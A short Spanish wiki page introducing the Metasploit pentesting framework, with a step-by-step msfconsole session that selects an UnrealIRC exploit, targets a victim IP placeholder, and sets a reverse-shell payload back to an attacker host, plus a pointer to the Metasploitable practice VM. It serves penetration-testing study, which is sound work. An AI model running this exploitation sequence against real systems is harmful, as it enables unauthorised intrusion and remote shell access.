====== Metasploit ======

Software para pentesting (//penetration testing//).

  * [[https://www.metasploit.com/|Web oficial]]

===== Ejemplo =====

Ejemplo de una sesión con ''mfsconsole'':

Búsqueda en la base de datos de Metasploit para encontrar exploits de vulnerabilidades:

<code>
search unrealirc
</code>

Información sobre el resultado encontrado:

<code>
info 0
</code>

Seleccionar el exploit:

<code>
use 0
</code>

Ahora miramos las opciones del módulo de metasploit seleccionado:

<code>
options
</code>

Configuramos opciones del equipo víctima:

<code>
set RHOSTS <IP_VICTIMA>
</code>

Mostramos payloads:

<code>
show payloads
</code>

Elegimos un payload (el 9 en este caso):

<code>
set payload 9
</code>

Configuramos una shell inversa en el equipo atacante:

<code>
set LHOST <IP_ATACANTE>
</code>

Con el comando ''options'' se pueden ver las configuraciones establecidas para el módulo de metasploit

Ejecutamos el payload:

<code>
run
</code>

===== Metasploitable =====

Máquina virtual creada con un montón de vulnerabilidades para usarse con metasploit.

  * [[https://github.com/rapid7/metasploitable3]]